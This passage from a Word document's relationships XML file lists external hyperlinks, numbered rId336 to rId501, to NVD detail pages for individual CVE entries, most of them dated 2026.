Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72933" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72940" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72950" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72959" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72960" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72972" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72973" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72986" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73006" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73012" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73013" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73016" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73018" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73023" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73028" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76647" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76851" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77105" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77106" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77480" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77481" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77482" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77483" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77484" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77486" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77487" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77504" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77826" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77901" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77906" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77907" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77908" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78074" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78439" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78442" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78456" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78462" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78463" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78504" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78505" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78507" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78511" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78512" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78514" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78517" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78518" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78519" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78521" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78524" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78525" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78526" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78834" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79376" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79602" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79674" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79744" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80074" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80077" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80080" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80081" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80083" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80085" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80096" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80465" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81352" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81385" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81543" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81952" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81955" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81996" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82536" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83941" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83992" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83996" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83998" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84187" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85049" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85051" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85053" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85094" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85175" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85430" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85432" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85455" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85684" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85877" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86076" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86083" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86730" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2018-1000164" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-25766" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-36939" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-37267" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0799" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12611" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13097" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33197" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46636" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55250" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62384" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62648" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62649" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62650" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63312" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66840" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67281" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69664" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70399" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71380" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71404" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71981" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73314" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73316" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74835" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75124" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75133" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75813" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75960" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76224" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76639" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77111" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77393" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78677" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78681" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78682" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79707" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80205" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80219" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82882" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83605" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83606" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83607" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83608" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83609" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83612" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83613" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83614" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83615" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83616" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83617" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83618" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83619" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84190" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84202" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84208" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84476" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84482" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85147" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85169" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85174" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85429" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85431" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85436" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85441" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85442" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85444" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85445" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85446" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85447" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85449" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85450" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85452" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85540" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 